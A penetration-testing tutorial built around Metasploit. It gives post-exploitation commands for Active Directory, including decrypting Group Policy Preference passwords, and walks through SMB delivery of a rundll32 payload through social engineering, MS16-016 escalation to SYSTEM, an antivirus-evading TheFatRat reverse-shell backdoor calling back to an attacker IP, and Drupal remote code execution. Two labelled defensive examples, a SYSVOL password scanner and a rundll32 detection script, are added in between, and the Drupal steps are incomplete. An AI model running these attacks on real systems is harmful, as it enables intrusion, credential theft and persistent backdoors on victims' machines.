Penetration Testing in Active Directory using Metasploit (Part 2)

Enumerate all logged on users

This module will enumerate current and recently logged on Windows users.

msf > use post/windows/gather/enum_logged_on_users
msf post(enum_logged_on_users) > set session 1
msf post(enum_logged_on_users) > exploit


Gather All Group Policy Preferences
This module enumerates the victim machine's domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsoft's public AES key. Cached Group Policy files may remain if the group policy object is deleted rather than unlinked. Tested on a WinXP SP3 client and a Win2k8 R2 DC.

msf > use post/windows/gather/credentials/gpp
msf post(gpp) > set session 1
msf post(gpp) > exploit
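What this module hunts for can be found and cleaned up from the defender's side without decrypting anything. The following scanner is an added example, not code from the original post or from Metasploit: it walks a copy of a SYSVOL tree for the Group Policy Preference XML files that are known to carry a cpassword attribute and reports every element that has one. The Groups.xml content, the GPO folder name and the account names are constructed for the example.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from typing import List, NamedTuple

# Group Policy Preference files known to carry the "cpassword" attribute
# (compared case-insensitively, since SYSVOL is served from NTFS).
GPP_FILES = frozenset({"groups.xml", "services.xml", "scheduledtasks.xml",
                       "datasources.xml", "drives.xml", "printers.xml"})


class Finding(NamedTuple):
    path: str
    tag: str                # element that carried the attribute, usually "Properties"
    account: str            # userName / accountName / runAs, if the element has one
    password_stored: bool   # False when cpassword="" (nothing to decrypt)


def scan_xml(path: str) -> List[Finding]:
    """Return one Finding per element in the file that has a cpassword attribute."""
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return []  # malformed file: report nothing rather than abort the sweep
    findings = []
    for elem in root.iter():
        if "cpassword" not in elem.attrib:
            continue
        account = next((elem.attrib[k] for k in ("userName", "accountName", "runAs")
                        if k in elem.attrib), "")
        findings.append(Finding(path, elem.tag, account, elem.attrib["cpassword"] != ""))
    return findings


def scan_tree(root_dir: str) -> List[Finding]:
    """Walk a SYSVOL copy (or any directory) and scan every GPP file found in it."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name.lower() in GPP_FILES:
                findings.extend(scan_xml(os.path.join(dirpath, name)))
    return findings


# Constructed Groups.xml: one local account with a stored password, one without.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin">
    <Properties action="U" userName="LocalAdmin" cpassword="CONSTRUCTED-BASE64-VALUE="
                changeLogon="0" noChange="1" neverExpires="1"/>
  </User>
  <User name="Helpdesk">
    <Properties action="U" userName="Helpdesk" description="no password stored here"/>
  </User>
</Groups>
"""


def demo() -> List[Finding]:
    """Build a throwaway SYSVOL-like tree containing the constructed file and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        gpp_dir = os.path.join(tmp, "Policies", "{PLACEHOLDER-GPO-GUID}",
                               "Machine", "Preferences", "Groups")
        os.makedirs(gpp_dir)
        with open(os.path.join(gpp_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return scan_tree(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f"{f.path}: <{f.tag}> account={f.account!r} password_stored={f.password_stored}")
```

Run scan_tree against a mounted or copied SYSVOL; any finding with password_stored=True is an account whose password is recoverable by anyone who can read SYSVOL, since the AES key the module uses is published by Microsoft. The fix is to remove the password from the preference item (or delete the item), rotate the affected account, and confirm that the MS14-025 update, which removed the ability to store new passwords this way, is installed on the management hosts.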



Find All DNS Service Records
Enumerates known SRV records for a given domain using the target host's DNS query tool.

msf > use post/multi/gather/dns_srv_lookup
msf post(dns_srv_lookup) > set domain rajlab.com
msf post(dns_srv_lookup) > set session 1
msf post(dns_srv_lookup) > exploit


Find All Services in Server
This module will query the system for services and display the name and configuration info for each returned service. It optionally lets you search the credentials, path, or start type for a string and return only the results that match. These query operations are cumulative; if no query strings are specified, it returns all services. NOTE: If the script hangs, Windows Firewall is most likely on and you did not migrate to a safe process (explorer.exe, for example).

msf > use post/windows/gather/enum_services
msf post(enum_services) > set session 1
msf post(enum_services) > exploit


Find All Active Directory TCP sessions

This module lists current TCP sessions.

msf > use post/windows/gather/tcpnetstat
msf post(tcpnetstat) > set session 1
msf post(tcpnetstat) > exploit


Find All Installed Applications in Server

This module will enumerate all installed applications.

msf > use post/windows/gather/enum_applications
msf post(enum_applications) > set session 1
msf post(enum_applications) > exploit


Find All Remote Desktop Sessions

This module dumps MRU and connection data for RDP sessions.

msf > use post/windows/gather/enum_termserv
msf post(enum_termserv) > set session 1
msf post(enum_termserv) > exploit

Hack Remote Windows PC using DLL Files (SMB Delivery Exploit)

This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. It currently supports DLLs and PowerShell.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/windows/smb/smb_delivery
msf exploit(smb_delivery) > set srvhost 192.168.1.101 (IP of local host)
msf exploit(smb_delivery) > set srvport 445
msf exploit(smb_delivery) > exploit

Now, we have to get the rundll32.exe command that the module generates pasted into the Run dialog on the victim's PC, using a social engineering method.
As soon as that happens, we will get access to the victim's PC.


Now type sessions -i to display the sessions opened when the victim runs the generated command.

Once the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.
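On the defending side, the tell-tale of this delivery is a rundll32.exe process whose command line names a DLL on a UNC path, which is exactly what the generated command does. The following detection is an added example, not part of the original post or of Metasploit: it parses a few constructed process-creation records (a simplified pipe-separated export standing in for Sysmon event 1 or Security event 4688 data) and flags rundll32 launches that load from a share, skipping hosts on an allow-list. The hostnames, users, timestamps and the share path are constructed.

```python
import re
from typing import Dict, FrozenSet, List, Optional

# Constructed process-creation records, "time|host|user|image|command_line",
# standing in for Sysmon event 1 / Security event 4688 data exported from a SIEM.
SAMPLE_LOG = r"""
2020-03-01T10:00:01|WS01|alice|C:\Windows\System32\rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL
2020-03-01T10:00:05|WS01|alice|C:\Windows\System32\rundll32.exe|rundll32.exe \\192.168.1.101\share\test.dll,0
2020-03-01T10:00:09|WS02|bob|C:\Windows\explorer.exe|explorer.exe
2020-03-01T10:00:12|WS02|bob|C:\Windows\System32\rundll32.exe|RUNDLL32.EXE \\fileserver\apps\legit.dll,EntryPoint
"""

# A UNC path: two backslashes, a host, a backslash, then the share/file part
# (stops at whitespace or at the comma that precedes the rundll32 entry point).
UNC_PATH = re.compile(r"\\\\[^\\\s]+\\[^\s,]+")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one record into its fields; return None for blank or malformed lines."""
    parts = line.split("|", 4)
    if len(parts) != 5:
        return None
    return dict(zip(("time", "host", "user", "image", "command_line"), parts))


def detect_unc_rundll32(log_text: str,
                        trusted_hosts: FrozenSet[str] = frozenset()) -> List[Dict[str, str]]:
    """Flag rundll32.exe launches whose command line loads a DLL from a UNC path."""
    trusted = {h.lower() for h in trusted_hosts}
    alerts = []
    for raw in log_text.splitlines():
        rec = parse_line(raw.strip())
        if rec is None or not rec["image"].lower().endswith("rundll32.exe"):
            continue
        for match in UNC_PATH.finditer(rec["command_line"]):
            unc_host = match.group(0)[2:].split("\\", 1)[0]
            if unc_host.lower() in trusted:
                continue  # known file server: left to the allow-list review
            alerts.append({**rec, "unc_host": unc_host, "unc_path": match.group(0)})
    return alerts


if __name__ == "__main__":
    for a in detect_unc_rundll32(SAMPLE_LOG, trusted_hosts=frozenset({"fileserver"})):
        print(f"{a['time']} {a['host']} {a['user']}: rundll32 loaded {a['unc_path']} from {a['unc_host']}")
```

Paired with the detection, the practical mitigation for this technique is to block outbound SMB (TCP 445, the srvport set above) from workstations to anything but known file servers at the host and perimeter firewall, so rundll32 cannot fetch the DLL from an attacker-controlled share in the first place.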

Get Admin Access of Remote Windows PC using MS16-016 mrxdav.sys WebDav Escalation

This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7

First hack the victim PC using Metasploit (Tutorial: How to Hack Remote PC)

Open a Kali terminal and type msfconsole


Now type use exploit/windows/local/ms16_016_webdav
msf exploit(ms16_016_webdav) > set session 1
msf exploit(ms16_016_webdav) > exploit

Hack Remote Windows 10 PC using FatRat

TheFatRat is an easy tool for generating backdoors with msfvenom (part of the Metasploit Framework). It compiles a C program with a meterpreter reverse_tcp payload in it that can then be executed on a Windows host; the compiled program is claimed to bypass most AV.

First, to install thefatrat we type the following command on terminal:


git clone https://github.com/Screetsec/TheFatRat.git


Once the cloning is done, change into the cloned TheFatRat directory in the terminal and type the following command to start it:

./fatrat

It will show you many options now select option 1 which is to CREATE BACKDOOR WITH MSFVENOM.


Now it will give a list of options for the format of the backdoor, which you choose according to your requirements. To create a Windows executable as a backdoor, choose option 2.


Now enter the LHOST IP, i.e. your system IP, and the LPORT, i.e. the port on which you want the reverse connection to your attacker system. In my case the LHOST is 192.168.0.104 and the LPORT is 4444.
Then exit the script by selecting y when asked.


Now the generated backdoor will be present in the output directory.


Now use any trick up your sleeve to transport the backdoor to the victim, and set up the reverse handler in Metasploit with the following commands on the msf terminal:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.104 (the attacker system IP)
set lport 4444
exploit

As soon as the backdoor is executed on the victim's machine you will get a meterpreter shell, as you can see in my case.



Hack Drupal Website using Drupal RESTWS Module Remote PHP Code Execution




Exploit Targets
RESTWS 2.x

Requirement
Attacker: kali Linux
Victim PC: drupal

Open a Kali terminal and type msfconsole



msf exploit(drupal_restws_exec) > set targeturi /
msf exploit(drupal_restws_exec) > set rhost 192.168.0.4 (IP of remote host)
msf exploit(drupal_restws_exec) > exploit